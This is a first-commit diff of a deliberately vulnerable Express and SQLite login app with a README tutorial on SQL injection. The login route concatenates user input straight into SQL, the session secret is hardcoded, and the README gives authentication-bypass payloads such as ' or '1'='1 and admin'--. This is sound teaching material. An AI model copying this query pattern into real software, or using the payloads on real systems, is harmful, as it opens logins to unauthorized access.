fisrt release

.gitignore

@@ -0,0 +1 @@
+node_modules

LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2019 0xdbe
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

README.md

@@ -0,0 +1,53 @@
+# Hands-on Express SQLi
+
+This application is a demonstration prototype just to show how to perform SQLi attack.
+
+## Setting-up
+
+### Deploy on heroku
+
+[![Deploy](https://www.herokucdn.com/deploy/button.svg)](https://heroku.com/deploy?template=https://github.com/0xdbe/Hands-on-Express-SQLi)
+
+### Deploy on your host
+
+* Install nodejs
+
+* Install dependencies
+
+```console
+$ npm install
+```
+
+* Start application
+
+```console
+$ node app.js
+```
+
+## Tutorial
+
+### Always True SQLi
+
+Open http://localhost:3000/ and log in with:
+
+* username: ' or '1'='1
+* password: ' or '1'='1
+
+```
+SELECT name FROM user where username = '' or '1'='1' and password = '' or '1'='1'
+```
+
+You are now log in as "User", but you can do better!
+
+### SQLi with comment
+
+Open http://localhost:3000/ and log in with:
+
+* username: admin'--
+* password: a
+
+```
+SELECT name FROM user where username = 'admin' --' and password = 'a'
+```
+
+You are now log in as "Admin",

app.js

@@ -0,0 +1,143 @@
+// Define TCP port
+const PORT = process.env.PORT || 3000;
+
+// Import from Node.js standard library
+const fs = require('fs');
+const path = require('path');
+
+// Import from third part package
+var bodyParser = require('body-parser');
+const express = require('express');
+const session = require('express-session');
+const pug = require('pug');
+const sqlite3 = require('sqlite3');
+
+// Create an express application
+const app = express();
+
+// Cookie settings for CSRF hands-on
+const cookieConfig = {
+  path: '/', 
+  httpOnly: true,
+  secure: false,
+  maxAge: 600000,
+  sameSite: 'none'
+};
+
+// Session settings
+var sessionConfig = {
+  cookie: cookieConfig,
+  resave: false,
+  saveUninitialized: false,
+  secret: 'mySecret'
+};
+
+// Enable module
+app.use(session(sessionConfig));
+app.use(bodyParser.urlencoded({extended: true}));
+app.use(express.static(path.join(__dirname, '/static')));
+
+// Create user database
+var db = new sqlite3.Database(':memory:');
+db.serialize(function() {
+  db.run("CREATE TABLE user (username TEXT, password TEXT, name TEXT)");
+  db.run("INSERT INTO user VALUES ('user', 'user123', 'User')");
+  db.run("INSERT INTO user VALUES ('client', 'client123', 'Client')");
+  db.run("INSERT INTO user VALUES ('admin', 'admin123', 'App Administrator')");
+});
+
+// Build pug template
+const viewAccount = pug.compileFile('view/account.pug');
+const viewLogin = pug.compileFile('view/login.pug');
+
+app.get('/', (req, res) => {
+
+  // Get current session
+  let session = req.session;
+
+  if(session.username){
+    // User already log in
+    res.redirect("/account");
+  }else{
+    res.redirect("/login");
+  }
+
+});
+
+// Login endpoint
+app.get('/account', (req, res) => {
+
+  // Get current session
+  let session = req.session;
+
+  if(session.username){  
+    let content = viewAccount({name: session.username});
+    res.send(content);
+  }else{
+    res.redirect("/login");
+  }
+});
+
+
+// Login endpoint
+app.get('/login', (req, res) => {
+
+  // Get current session
+  let session = req.session;
+
+  if(session.username){
+    // User already log in
+    res.redirect("/account");
+  }else{
+    let content = viewLogin();
+    res.send(content);
+  }
+
+});
+
+app.post('/login', (req, res) => {
+
+  // Get current session
+  let session = req.session;
+
+  if(session.username){
+    res.redirect("/account");
+  }else{
+
+    let username = req.body.username;
+    let password = req.body.password;
+    let query = "SELECT name FROM user where username = '" + username + "' and password = '" + password + "'";
+
+    console.log('query: ' + query);
+
+    db.get(query , function(err, row) {
+
+      if(err) {
+        console.log('ERROR', err);
+        // Technical issue
+        let content = viewLogin({message: err});
+        res.send(content);
+      } else if (!row) {
+        // User not found
+        let content = viewLogin({message: 'unauthorized'});
+        res.send(content);
+      } else {
+        // User found
+        session.username = row.name;
+        res.redirect("/account");
+      }
+
+    });
+
+  }
+
+});
+
+// Logout endpoint
+app.get('/logout', (req, res) => {
+  req.session.destroy();
+  res.redirect("/login");
+});
+
+// Start Application
+app.listen(PORT, '0.0.0.0', () => console.log('app listening on 3000'));

app.json

@@ -0,0 +1,8 @@
+{
+  "name": "Hands-on Express SQLi",
+  "description": "This application is a demonstration prototype just to show how to perform SQLi attacks.",
+  "repository": "https://github.com/0xdbe/Hands-on-Express-SQLi",
+  "keywords": ["node", "express", "sqli"]
+} 
+
+